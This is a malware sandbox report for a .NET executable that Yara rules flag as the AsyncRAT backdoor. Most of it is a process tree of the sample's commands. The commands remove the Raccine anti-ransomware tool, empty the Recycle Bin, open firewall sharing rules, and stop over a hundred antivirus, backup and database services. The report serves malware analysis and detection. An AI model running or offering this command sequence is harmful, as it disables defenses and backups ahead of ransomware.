Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	March 24, 2021, 10:06 a.m.	March 24, 2021, 10:11 a.m.

Size	91.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`b4282c7f3fa918a48c6cc2a8d1872764`
SHA256	`899f48bad035165acf8869af63922619f8a901bbeb8a7fc13919ba90dd9e7768`
CRC32	`7D155541`
ssdeep	`1536:G718o+8A24NUZLtF1EUZXwjAb5J9lEYjXbNzHr9RfmTQX86s:G71j+8ApApQEXlb9ZXbh9RfmTQMV`
Yara	PE_Header_Zero - PE File Signature Zero IsPE32 - (no description) IsNET_EXE - (no description) IsWindowsGUI - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT

Client-0.exe "C:\Users\test22\AppData\Local\Temp\Client-0.exe"
1836
- taskkill.exe "taskkill" /F /IM RaccineSettings.exe
  5540
- reg.exe "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
  8324
- reg.exe "reg" delete HKCU\Software\Raccine /F
  8752
- schtasks.exe "schtasks" /DELETE /TN "Raccine Rules Updater" /F
  4980
- cmd.exe "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
  5332
- cmd.exe "cmd.exe" /c rd /s /q D:\\$Recycle.bin
  2120
- sc.exe "sc.exe" config Dnscache start= auto
  4220
- sc.exe "sc.exe" config FDResPub start= auto
  4404
- sc.exe "sc.exe" config SQLTELEMETRY start= disabled
  3724
- netsh.exe "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
  6980
- sc.exe "sc.exe" config SSDPSRV start= auto
  7912
- sc.exe "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  3456
- sc.exe "sc.exe" config SstpSvc start= disabled
  7884
- netsh.exe "netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes
  8496
- sc.exe "sc.exe" config upnphost start= auto
  7804
- sc.exe "sc.exe" config SQLWriter start= disabled
  8156
- net.exe "net.exe" start Dnscache /y
  7276
  - net1.exe C:\Windows\system32\net1 start Dnscache /y
    1552
- net.exe "net.exe" stop bedbg /y
  5512
  - net1.exe C:\Windows\system32\net1 stop bedbg /y
    5000
- net.exe "net.exe" start FDResPub /y
  7280
  - net1.exe C:\Windows\system32\net1 start FDResPub /y
    6372
- net.exe "net.exe" start SSDPSRV /y
  7588
  - net1.exe C:\Windows\system32\net1 start SSDPSRV /y
    1476
- net.exe "net.exe" stop MSSQL$SQL_2008 /y
  7160
  - net1.exe C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
    5520
- net.exe "net.exe" stop avpsus /y
  3356
  - net1.exe C:\Windows\system32\net1 stop avpsus /y
    7708
- net.exe "net.exe" stop MMS /y
  3024
  - net1.exe C:\Windows\system32\net1 stop MMS /y
    2384
- net.exe "net.exe" start upnphost /y
  6752
  - net1.exe C:\Windows\system32\net1 start upnphost /y
    8176
- net.exe "net.exe" stop McAfeeDLPAgentService /y
  6620
  - net1.exe C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    540
- net.exe "net.exe" stop MSSQL$SQLEXPRESS /y
  5924
  - net1.exe C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
    8952
- net.exe "net.exe" stop EhttpSrv /y
  3036
  - net1.exe C:\Windows\system32\net1 stop EhttpSrv /y
    4436
- net.exe "net.exe" stop mfewc /y
  4308
  - net1.exe C:\Windows\system32\net1 stop mfewc /y
    2092
- net.exe "net.exe" stop ekrn /y
  6736
  - net1.exe C:\Windows\system32\net1 stop ekrn /y
    5056
- net.exe "net.exe" stop ccEvtMgr /y
  7856
  - net1.exe C:\Windows\system32\net1 stop ccEvtMgr /y
    5976
- net.exe "net.exe" stop mozyprobackup /y
  2036
  - net1.exe C:\Windows\system32\net1 stop mozyprobackup /y
    8100
- net.exe "net.exe" stop BMR Boot Service /y
  5316
  - net1.exe C:\Windows\system32\net1 stop BMR Boot Service /y
    3636
- net.exe "net.exe" stop ccSetMgr /y
  7760
  - net1.exe C:\Windows\system32\net1 stop ccSetMgr /y
    8284
- net.exe "net.exe" stop MSSQL$TPS /y
  1772
  - net1.exe C:\Windows\system32\net1 stop MSSQL$TPS /y
    5808
- net.exe "net.exe" stop MSSQL$SYSTEM_BGC /y
  5092
  - net1.exe C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
    6656
- net.exe "net.exe" stop SavRoam /y
  5544
  - net1.exe C:\Windows\system32\net1 stop SavRoam /y
    8880
- net.exe "net.exe" stop NetBackup BMR MTFTP Service /y
  5792
  - net1.exe C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    1364
- net.exe "net.exe" stop EPUpdateService /y
  3772
  - net1.exe C:\Windows\system32\net1 stop EPUpdateService /y
    5108
- net.exe "net.exe" stop EPSecurityService /y
  4188
  - net1.exe C:\Windows\system32\net1 stop EPSecurityService /y
    3940
- net.exe "net.exe" stop DefWatch /y
  2996
  - net1.exe C:\Windows\system32\net1 stop DefWatch /y
    8312
- net.exe "net.exe" stop RTVscan /y
  5140
  - net1.exe C:\Windows\system32\net1 stop RTVscan /y
    5372
- net.exe "net.exe" stop ntrtscan /y
  4324
  - net1.exe C:\Windows\system32\net1 stop ntrtscan /y
    4548
- net.exe "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  6112
  - net1.exe C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    8240
- net.exe "net.exe" stop QBFCService /y
  1188
  - net1.exe C:\Windows\system32\net1 stop QBFCService /y
    5164
- net.exe "net.exe" stop VSNAPVSS /y
  3756
  - net1.exe C:\Windows\system32\net1 stop VSNAPVSS /y
    5772
- net.exe "net.exe" stop MSSQL$TPSAMA /y
  5384
  - net1.exe C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
    6156
- net.exe "net.exe" stop EsgShKernel /y
  5680
  - net1.exe C:\Windows\system32\net1 stop EsgShKernel /y
    8884
- net.exe "net.exe" stop QBIDPService /y
  4576
  - net1.exe C:\Windows\system32\net1 stop QBIDPService /y
    6608
- net.exe "net.exe" stop VeeamTransportSvc /y
  8200
  - net1.exe C:\Windows\system32\net1 stop VeeamTransportSvc /y
    8244
- net.exe "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  1292
  - net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    7116
- net.exe "net.exe" stop PDVFSService /y
  5844
  - net1.exe C:\Windows\system32\net1 stop PDVFSService /y
    6964
- net.exe "net.exe" stop Intuit.QuickBooks.FCS /y
  3184
  - net1.exe C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    1720
- net.exe "net.exe" stop VeeamDeploymentService /y
  7428
  - net1.exe C:\Windows\system32\net1 stop VeeamDeploymentService /y
    7852
- net.exe "net.exe" stop KAVFS /y
  1452
  - net1.exe C:\Windows\system32\net1 stop KAVFS /y
    3600
- net.exe "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  5100
  - net1.exe C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    2216
- net.exe "net.exe" stop QBCFMonitorService /y
  4300
  - net1.exe C:\Windows\system32\net1 stop QBCFMonitorService /y
    3368
- net.exe "net.exe" stop VeeamNFSSvc /y
  2080
  - net1.exe C:\Windows\system32\net1 stop VeeamNFSSvc /y
    8996
- net.exe "net.exe" stop SQLWriter /y
  8912
  - net1.exe C:\Windows\system32\net1 stop SQLWriter /y
    6516
- net.exe "net.exe" stop ESHASRV /y
  4172
  - net1.exe C:\Windows\system32\net1 stop ESHASRV /y
    2284
- net.exe "net.exe" stop YooBackup /y
  2472
  - net1.exe C:\Windows\system32\net1 stop YooBackup /y
    2044
- net.exe "net.exe" stop veeam /y
  5868
  - net1.exe C:\Windows\system32\net1 stop veeam /y
    3896
- net.exe "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  732
  - net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
    4704
- net.exe "net.exe" stop SDRSVC /y
  2260
  - net1.exe C:\Windows\system32\net1 stop SDRSVC /y
    4820
- net.exe "net.exe" stop YooIT /y
  5848
  - net1.exe C:\Windows\system32\net1 stop YooIT /y
    2368
- net.exe "net.exe" stop BackupExecAgentBrowser /y
  8588
  - net1.exe C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    8384
- net.exe "net.exe" stop PDVFSService /y
  4152
  - net1.exe C:\Windows\system32\net1 stop PDVFSService /y
    1160
- net.exe "net.exe" stop KAVFSGT /y
  5576
  - net1.exe C:\Windows\system32\net1 stop KAVFSGT /y
    4408
- net.exe "net.exe" stop MSSQL$VEEAMSQL2012 /y
  4564
  - net1.exe C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
    7444
- net.exe "net.exe" stop zhudongfangyu /y
  8064
  - net1.exe C:\Windows\system32\net1 stop zhudongfangyu /y
    5352
- net.exe "net.exe" stop BackupExecVSSProvider /y
  6568
  - net1.exe C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    6636
- net.exe "net.exe" stop BackupExecDiveciMediaService /y
  8572
  - net1.exe C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    7000
- net.exe "net.exe" stop VeeamBackupSvc /y
  6420
  - net1.exe C:\Windows\system32\net1 stop VeeamBackupSvc /y
    5116
- net.exe "net.exe" stop FA_Scheduler /y
  8140
  - net1.exe C:\Windows\system32\net1 stop FA_Scheduler /y
    808
- net.exe "net.exe" stop stc_raw_agent /y
  6708
  - net1.exe C:\Windows\system32\net1 stop stc_raw_agent /y
    5992
- net.exe "net.exe" stop BackupExecAgentAccelerator /y
  3716
  - net1.exe C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    7196
- net.exe "net.exe" stop BackupExecJobEngine /y
  6584
  - net1.exe C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3420
- net.exe "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
  2564
  - net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
    5080
- net.exe "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  4180
  - net1.exe C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    5128
- net.exe "net.exe" stop BackupExecManagementService /y
  5280
  - net1.exe C:\Windows\system32\net1 stop BackupExecManagementService /y
    2904
- net.exe "net.exe" stop “Sophos Device Control Service” /y
  5376
  - net1.exe C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
    5048
- net.exe "net.exe" stop NetMsmqActivator /y
  4072
  - net1.exe C:\Windows\system32\net1 stop NetMsmqActivator /y
    7880
- net.exe "net.exe" stop kavfsslp /y
  4464
  - net1.exe C:\Windows\system32\net1 stop kavfsslp /y
    4328
- net.exe "net.exe" stop VeeamBrokerSvc /y
  912
  - net1.exe C:\Windows\system32\net1 stop VeeamBrokerSvc /y
    4932
- net.exe "net.exe" stop BackupExecRPCService /y
  5488
  - net1.exe C:\Windows\system32\net1 stop BackupExecRPCService /y
    8296
- net.exe "net.exe" stop MSExchangeIS /y
  8796
  - net1.exe C:\Windows\system32\net1 stop MSExchangeIS /y
    3656
- net.exe "net.exe" stop ReportServer$SYSTEM_BGC /y
  2592
  - net1.exe C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
    6276
- net.exe "net.exe" stop MSSQLServerADHelper /y
  2416
  - net1.exe C:\Windows\system32\net1 stop MSSQLServerADHelper /y
    7916
- net.exe "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
  1488
  - net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
    6936
- net.exe "net.exe" stop AcrSch2Svc /y
  6348
  - net1.exe C:\Windows\system32\net1 stop AcrSch2Svc /y
    9204
- net.exe "net.exe" stop “Sophos AutoUpdate Service” /y
  8872
  - net1.exe C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
    8536
- net.exe "net.exe" stop “Symantec System Recovery” /y
  4856
  - net1.exe C:\Windows\system32\net1 stop “Symantec System Recovery” /y
    3276
- net.exe "net.exe" stop McAfeeEngineService /y
  1508
  - net1.exe C:\Windows\system32\net1 stop McAfeeEngineService /y
    2816
- net.exe "net.exe" stop klnagent /y
  2448
  - net1.exe C:\Windows\system32\net1 stop klnagent /y
    4952
- net.exe "net.exe" stop AcronisAgent /y
  8056
  - net1.exe C:\Windows\system32\net1 stop AcronisAgent /y
    4092
- net.exe "net.exe" stop SamSs /y
  8504
  - net1.exe C:\Windows\system32\net1 stop SamSs /y
    6560
- net.exe "net.exe" stop MSOLAP$SQL_2008 /y
  7736
  - net1.exe C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
    2272
- net.exe "net.exe" stop VeeamHvIntegrationSvc /y
  2320
  - net1.exe C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
    1320
- net.exe "net.exe" stop VeeamCatalogSvc /y
  6828
  - net1.exe C:\Windows\system32\net1 stop VeeamCatalogSvc /y
    6972
- net.exe "net.exe" stop CASAD2DWebSvc /y
  3108
  - net1.exe C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    6296
- net.exe "net.exe" stop ReportServer /y
  7176
  - net1.exe C:\Windows\system32\net1 stop ReportServer /y
    204
- net.exe "net.exe" stop UI0Detect /y
  5132
  - net1.exe C:\Windows\system32\net1 stop UI0Detect /y
    5196
- net.exe "net.exe" stop MSSQLServerADHelper100 /y
  1640
  - net1.exe C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
    4852
- net.exe "net.exe" stop CAARCUpdateSvc /y
  4532
  - net1.exe C:\Windows\system32\net1 stop CAARCUpdateSvc /y
    5400
- net.exe "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
  1724
  - net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
    6476
- net.exe "net.exe" stop MSExchangeSA /y
  1828
  - net1.exe C:\Windows\system32\net1 stop MSExchangeSA /y
    4236
- net.exe "net.exe" stop McAfeeFramework /y
  4080
  - net1.exe C:\Windows\system32\net1 stop McAfeeFramework /y
    6588
- net.exe "net.exe" stop “SQLsafe Backup Service” /y
  6536
  - net1.exe C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
    8948
- net.exe "net.exe" stop “Sophos File Scanner Service” /y
  2664
  - net1.exe C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
    8868
- net.exe "net.exe" stop macmnsvc /y
  3220
  - net1.exe C:\Windows\system32\net1 stop macmnsvc /y
    3812
- net.exe "net.exe" stop “Acronis VSS Provider” /y
  6108
  - net1.exe C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
    5260
- net.exe "net.exe" stop VeeamMountSvc /y
  3400
  - net1.exe C:\Windows\system32\net1 stop VeeamMountSvc /y
    7312
- net.exe "net.exe" stop MsDtsServer110 /y
  8992
  - net1.exe C:\Windows\system32\net1 stop MsDtsServer110 /y
    4832
- net.exe "net.exe" stop ReportServer$TPS /y
  2240
  - net1.exe C:\Windows\system32\net1 stop ReportServer$TPS /y
    6344
- net.exe "net.exe" stop VeeamCloudSvc /y
  7352
  - net1.exe C:\Windows\system32\net1 stop VeeamCloudSvc /y
    6164
- net.exe "net.exe" stop MsDtsServer /y
  8004
  - net1.exe C:\Windows\system32\net1 stop MsDtsServer /y
    5672
- net.exe "net.exe" stop MSSQLServerOLAPService /y
  2220
  - net1.exe C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
    6068
- net.exe "net.exe" stop IISAdmin /y
  2540
  - net1.exe C:\Windows\system32\net1 stop IISAdmin /y
    7496
- net.exe "net.exe" stop POP3Svc /y
  3064
  - net1.exe C:\Windows\system32\net1 stop POP3Svc /y
    5300
- net.exe "net.exe" stop MSSQLFDLauncher$TPS /y
  3328
  - net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
    5340
- net.exe "net.exe" stop “Veeam Backup Catalog Data Service” /y
  2300
  - net1.exe C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
    7224
- net.exe "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
  648
  - net1.exe C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
    4068
- net.exe "net.exe" stop MSExchangeMGMT /y
  7740
  - net1.exe C:\Windows\system32\net1 stop MSExchangeMGMT /y
    9004
- net.exe "net.exe" stop MSOLAP$SYSTEM_BGC /y
  5252
  - net1.exe C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
    1136
- net.exe "net.exe" stop MSExchangeES /y
  8096
  - net1.exe C:\Windows\system32\net1 stop MSExchangeES /y
    6932
- net.exe "net.exe" stop masvc /y
  4680
  - net1.exe C:\Windows\system32\net1 stop masvc /y
    5284
- net.exe "net.exe" stop VeeamNFSSvc /y
  3440
  - net1.exe C:\Windows\system32\net1 stop VeeamNFSSvc /y
    2436
- net.exe "net.exe" stop “Sophos Clean Service” /y
  7436
  - net1.exe C:\Windows\system32\net1 stop “Sophos Clean Service” /y
    8876
- net.exe "net.exe" stop W3Svc /y
  2668
  - net1.exe C:\Windows\system32\net1 stop W3Svc /y
    8092
- net.exe "net.exe" stop “Sophos Agent” /y
  3524
  - net1.exe C:\Windows\system32\net1 stop “Sophos Agent” /y
    9184
- net.exe "net.exe" stop VeeamDeploymentService /y
  6048
  - net1.exe C:\Windows\system32\net1 stop VeeamDeploymentService /y
    1100
- net.exe "net.exe" stop MySQL57 /y
  5632
  - net1.exe C:\Windows\system32\net1 stop MySQL57 /y
    8928
- net.exe "net.exe" stop SMTPSvc /y
  3604
  - net1.exe C:\Windows\system32\net1 stop SMTPSvc /y
    4968
- net.exe "net.exe" stop MSExchangeSRS /y
  3584
  - net1.exe C:\Windows\system32\net1 stop MSExchangeSRS /y
    8332
- net.exe "net.exe" stop EraserSvc11710 /y
  6428
  - net1.exe C:\Windows\system32\net1 stop EraserSvc11710 /y
    7544
- net.exe "net.exe" stop McShield /y
  9144
  - net1.exe C:\Windows\system32\net1 stop McShield /y
    8372
- net.exe "net.exe" stop MSSQLFDLauncher$TPSAMA /y
  2676
  - net1.exe C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
    8152
- net.exe "net.exe" stop ReportServer$SQL_2008 /y
  5588
  - net1.exe C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
    2952
- net.exe "net.exe" stop “Sophos Health Service” /y
  4544
  - net1.exe C:\Windows\system32\net1 stop “Sophos Health Service” /y
    2724
- net.exe "net.exe" stop “Enterprise Client Service” /y
  4380
  - net1.exe C:\Windows\system32\net1 stop “Enterprise Client Service” /y
    6092
- net.exe "net.exe" stop MBAMService /y
  2840
  - net1.exe C:\Windows\system32\net1 stop MBAMService /y
    7636
- net.exe "net.exe" stop VeeamRESTSvc /y
  5604
  - net1.exe C:\Windows\system32\net1 stop VeeamRESTSvc /y
    296
- net.exe "net.exe" stop “SQLsafe Filter Service” /y
  1756
  - net1.exe C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
    5956
- net.exe "net.exe" stop ReportServer$TPSAMA /y
  3004
  - net1.exe C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
    3016
- net.exe "net.exe" stop “SQL Backups /y
  5640
  - net1.exe C:\Windows\system32\net1 stop “SQL Backups /y
    4148
- net.exe "net.exe" stop VeeamDeploySvc /y
  2164
  - net1.exe C:\Windows\system32\net1 stop VeeamDeploySvc /y
    8936
- net.exe "net.exe" stop MySQL80 /y
  8624
  - net1.exe C:\Windows\system32\net1 stop MySQL80 /y
    5152
- net.exe "net.exe" stop msftesql$PROD /y
  6180
  - net1.exe C:\Windows\system32\net1 stop msftesql$PROD /y
    1004
- net.exe "net.exe" stop “Zoolz 2 Service” /y
  8108
  - net1.exe C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
    3304
- net.exe "net.exe" stop MsDtsServer100 /y
  1808
  - net1.exe C:\Windows\system32\net1 stop MsDtsServer100 /y
    2292
- net.exe "net.exe" stop MSSQLSERVER /y
  2780
  - net1.exe C:\Windows\system32\net1 stop MSSQLSERVER /y
    3336
- net.exe "net.exe" stop McTaskManager /y
  6448
  - net1.exe C:\Windows\system32\net1 stop McTaskManager /y
    3496
- net.exe "net.exe" stop SstpSvc /y
  3840
  - net1.exe C:\Windows\system32\net1 stop SstpSvc /y
    7432
- net.exe "net.exe" stop MSOLAP$TPS /y
  2716
  - net1.exe C:\Windows\system32\net1 stop MSOLAP$TPS /y
    772
- net.exe "net.exe" stop BackupExecAgentAccelerator /y
  8436
  - net1.exe C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    6224
- net.exe "net.exe" stop MBEndpointAgent /y
  8048
  - net1.exe C:\Windows\system32\net1 stop MBEndpointAgent /y
    3364
- net.exe "net.exe" stop VeeamTransportSvc /y
  2712
  - net1.exe C:\Windows\system32\net1 stop VeeamTransportSvc /y
    6812
- net.exe "net.exe" stop MSExchangeMTA /y
  6468
  - net1.exe C:\Windows\system32\net1 stop MSExchangeMTA /y
    8560
- net.exe "net.exe" stop “aphidmonitorservice” /y
  9176
  - net1.exe C:\Windows\system32\net1 stop “aphidmonitorservice” /y
    932
- net.exe "net.exe" stop MSSQL$ECWDB2 /y
  8576
  - net1.exe C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
    8800
- net.exe "net.exe" stop VeeamEnterpriseManagerSvc /y
  5456
  - net1.exe C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
    2152
- net.exe "net.exe" stop OracleClientCache80 /y
  6904
  - net1.exe C:\Windows\system32\net1 stop OracleClientCache80 /y
    5644
- net.exe "net.exe" stop BackupExecRPCService /y
  5168
  - net1.exe C:\Windows\system32\net1 stop BackupExecRPCService /y
    6652
- net.exe "net.exe" stop msexchangeadtopology /y
  2800
  - net1.exe C:\Windows\system32\net1 stop msexchangeadtopology /y
    152
- net.exe "net.exe" stop audioendpointbuilder /y
  5904
  - net1.exe C:\Windows\system32\net1 stop audioendpointbuilder /y
    5768
- net.exe "net.exe" stop mfefire /y
  1276
  - net1.exe C:\Windows\system32\net1 stop mfefire /y
    9052
- net.exe "net.exe" stop SQLAgent$PRACTTICEBGC /y
  4420
  - net1.exe C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
    8776
- net.exe "net.exe" stop MSSQL$SBSMONITORING /
  7344
  - net1.exe C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
    7744
- net.exe "net.exe" stop “Sophos MCS Agent” /y
  6168
  - net1.exe C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
    6768
- net.exe "net.exe" stop wbengine /y
  3084
  - net1.exe C:\Windows\system32\net1 stop wbengine /y
    3848
- net.exe "net.exe" stop “Sophos Safestore Service” /y
  8508
  - net1.exe C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
    3644
- net.exe "net.exe" stop SepMasterService /y
  6032
  - net1.exe C:\Windows\system32\net1 stop SepMasterService /y
    4628
- net.exe "net.exe" stop MSSQL$SBSMONITORING /y
  3576
  - net1.exe C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
    7788
- net.exe "net.exe" stop AcrSch2Svc /y
  4052
  - net1.exe C:\Windows\system32\net1 stop AcrSch2Svc /y
    9208
- net.exe "net.exe" stop ReportServer$SQL_2008 /y
  3540
  - net1.exe C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
    3768
- net.exe "net.exe" stop AVP /y
  5244
  - net1.exe C:\Windows\system32\net1 stop AVP /y
    2464
- net.exe "net.exe" stop SQLAgent$PRACTTICEMGT /y
  5104
  - net1.exe C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
    5796
- net.exe "net.exe" stop BackupExecAgentBrowser /y
  4720
  - net1.exe C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    2920
- net.exe "net.exe" stop MSOLAP$TPSAMA /y
  3664
  - net1.exe C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
    8448
- net.exe "net.exe" stop MSSQL$PRACTICEMGT /y
  2880
  - net1.exe C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
    6800
- net.exe "net.exe" stop ShMonitor /y
  7672
  - net1.exe C:\Windows\system32\net1 stop ShMonitor /y
    2560
- net.exe "net.exe" stop BackupExecVSSProvider /y
  2684
  - net1.exe C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    4416
- net.exe "net.exe" stop “intel(r) proset monitoring service” /y
  5620
  - net1.exe C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
    6208
- net.exe "net.exe" stop mfemms /y
  7288
  - net1.exe C:\Windows\system32\net1 stop mfemms /y
    1816
- net.exe "net.exe" stop “Sophos System Protection Service” /y
  9192
  - net1.exe C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
    1060
- net.exe "net.exe" stop wbengine /y
  4216
  - net1.exe C:\Windows\system32\net1 stop wbengine /y
    3032
- net.exe "net.exe" stop MSSQL$SHAREPOINT /y
  8304
  - net1.exe C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
    6780
- net.exe "net.exe" stop SQLAgent$PROD /y
  7844
  - net1.exe C:\Windows\system32\net1 stop SQLAgent$PROD /y
    8512
- net.exe "net.exe" stop msexchangeimap4 /y
  3764
  - net1.exe C:\Windows\system32\net1 stop msexchangeimap4 /y
    2484
- net.exe "net.exe" stop BackupExecDeviceMediaService /y
  3564
  - net1.exe C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
    6096
- net.exe "net.exe" stop Smcinst /y
  6900
  - net1.exe C:\Windows\system32\net1 stop Smcinst /y
    3052
- net.exe "net.exe" stop RESvc /y
  3424
  - net1.exe C:\Windows\system32\net1 stop RESvc /y
    3444
- net.exe "net.exe" stop DCAgent /y
  7480
  - net1.exe C:\Windows\system32\net1 stop DCAgent /y
    6016
- net.exe "net.exe" stop MSSQL$PRACTTICEBGC /y
  876
  - net1.exe C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
    8364
- net.exe "net.exe" stop “Sophos MCS Client” /y
  2504
  - net1.exe C:\Windows\system32\net1 stop “Sophos MCS Client” /y
    3828
- net.exe "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
  7948
  - net1.exe C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
    4508
- net.exe "net.exe" stop mfevtp /y
  6952
  - net1.exe C:\Windows\system32\net1 stop mfevtp /y
    5452
- net.exe "net.exe" stop SQLAgent$SYSTEM_BGC /y
  6532
  - net1.exe C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
    4964
- net.exe "net.exe" stop “Sophos Web Control Service” /y
  200
  - net1.exe C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
    6404
- net.exe "net.exe" stop ARSM /y
  3088
  - net1.exe C:\Windows\system32\net1 stop ARSM /y
    5184
- net.exe "net.exe" stop SmcService /y
  9180
  - net1.exe C:\Windows\system32\net1 stop SmcService /y
    8900
- net.exe "net.exe" stop sms_site_sql_backup /y
  2364
  - net1.exe C:\Windows\system32\net1 stop sms_site_sql_backup /y
    9300
- net.exe "net.exe" stop BackupExecJobEngine /y
  1204
  - net1.exe C:\Windows\system32\net1 stop BackupExecJobEngine /y
    9424
- net.exe "net.exe" stop swi_filter /y
  8344
  - net1.exe C:\Windows\system32\net1 stop swi_filter /y
    9484
- net.exe "net.exe" stop MSSQL$BKUPEXEC /y
  9276
  - net1.exe C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
    9664
- net.exe "net.exe" stop SQLAgent$SBSMONITORING /y
  9376
  - net1.exe C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
    9692
- net.exe "net.exe" stop SQLAgent$BKUPEXEC /y
  9456
  - net1.exe C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
    9924
- net.exe "net.exe" stop MSSQL$PROD /y
  9564
  - net1.exe C:\Windows\system32\net1 stop MSSQL$PROD /y
    10176
- net.exe "net.exe" stop SQLAgent$TPS /y
  9628
  - net1.exe C:\Windows\system32\net1 stop SQLAgent$TPS /y
    3928
- net.exe "net.exe" stop unistoresvc_1af40a /y
  9760
  - net1.exe C:\Windows\system32\net1 stop unistoresvc_1af40a /y
    10088
- net.exe "net.exe" stop SntpService /y
  9828
  - net1.exe C:\Windows\system32\net1 stop SntpService /y
    10080
- net.exe "net.exe" stop MSSQL$SOPHOS /y
  9892
  - net1.exe C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
    3964
- net.exe "net.exe" stop AcronisAgent /y
  9976
  - net1.exe C:\Windows\system32\net1 stop AcronisAgent /y
    9404
- net.exe "net.exe" stop SQLAgent$SHAREPOINT /y
  9328
  - net1.exe C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
    9792
- net.exe "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
  9268
  - net1.exe C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
    9940
- net.exe "net.exe" stop swi_service /y
  10052
  - net1.exe C:\Windows\system32\net1 stop swi_service /y
    9232
- net.exe "net.exe" stop BackupExecManagementService /y
  9648
  - net1.exe C:\Windows\system32\net1 stop BackupExecManagementService /y
    10000
- net.exe "net.exe" stop “Sophos Message Router” /y
  10200
  - net1.exe C:\Windows\system32\net1 stop “Sophos Message Router” /y
    9408
- net.exe "net.exe" stop SQLAgent$TPSAMA /y
  9748
  - net1.exe C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
    10212
- net.exe "net.exe" stop SQLTELEMETRY /y
  9656
  - net1.exe C:\Windows\system32\net1 stop SQLTELEMETRY /y
    9400
- net.exe "net.exe" stop sacsvr /y
  6484
